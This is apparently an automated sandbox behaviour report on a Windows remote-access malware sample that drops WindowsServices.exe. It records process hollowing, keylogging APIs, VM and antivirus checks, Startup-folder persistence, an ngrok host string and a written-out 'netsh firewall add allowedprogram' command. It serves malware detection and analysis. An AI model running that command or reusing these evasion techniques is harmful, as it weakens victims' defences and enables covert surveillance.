        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: DCD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: ECD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: FCD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 10CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 8860000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 9860000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: A860000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: A820000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 11CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 12CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: A960000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 15CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 16CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 17CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 18CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 19CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1ACD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1BCD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1CCD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1DCD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1ECD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1FCD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 20CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 21CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 22CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 23CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 24CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 25CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 26CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 27CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 28CD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 29CD0000 memory commit | memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: D9D0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: E9D0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 13DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 14DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 15DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 16DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 17DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 18DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 19DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1ADD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1BDD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1CDD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1DDD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1EDD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 1FDD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 20DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 21DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 22DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 23DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 24DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 25DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 26DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 27DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2B250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2C250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2D250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2E250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2F250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 30250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 31250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 32250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 33250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 34250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 11B50000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 165C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 175C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 165C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 25ED0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 26ED0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 27ED0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 35250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 36250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 37250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 38250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 39250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 3A250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 3B250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 3C250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 3D250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 3E250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 3F250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 40250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 34250000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 165C0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 11C0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2C70000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 4C70000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: E10000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: 2C60000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory allocated: ED0000 memory commit | memory reserve | memory write watch
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWindow / User API: threadDelayed 1136Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWindow / User API: threadDelayed 1469Jump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to dropped file
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeDropped PE file which has not been started: C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeDropped PE file which has not been started: C:\Users\user\Desktop\nOZ2Oqnzbz.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe TID: 5172Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe TID: 6544Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 7144Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6248Thread sleep time: -568000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6248Thread sleep time: -734500s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 2784Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 1020Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 6396Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe TID: 4180Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
        Source: WindowsServices.exe, 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmpBinary or memory string: VBoxServiceTrueTEMP'WindowsServices.exe#0.tcp.in.ngrok.io
        Source: wscript.exe, 00000008.00000002.1724300539.000001B2E79D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: WindowsServices.exe, 00000015.00000002.2000565447.0000000002C61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxService
        Source: netsh.exe, 0000000E.00000003.1819379283.00000000009F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeAPI call chain: ExitProcess graph end nodegraph_0-1829
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeAPI call chain: ExitProcess graph end nodegraph_0-1912
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeAPI call chain: ExitProcess graph end nodegraph_0-1911
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,0_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_00405A10 mov eax, dword ptr fs:[00000030h]0_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, kl.csReference to suspicious API methods: MapVirtualKey(a, 0u)
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, kl.csReference to suspicious API methods: GetAsyncKeyState(num2)
        Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, OK.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeCode function: 0_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,0_2_00405A10
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeMemory written: C:\Users\user\Desktop\nOZ2Oqnzbz.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeMemory written: C:\Users\user\AppData\Local\Temp\WindowsServices.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection unmapped: C:\Windows\System32\conhost.exe base address: 6AEC8B55
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection unmapped: C:\Windows\System32\conhost.exe base address: 6AEC8B55
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection unmapped: C:\Windows\System32\conhost.exe base address: 400000
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeSection unmapped: C:\Windows\System32\conhost.exe base address: 400000
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Users\user\Desktop\nOZ2Oqnzbz.exe C:\Users\user\Desktop\nOZ2Oqnzbz.exeJump to behavior
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
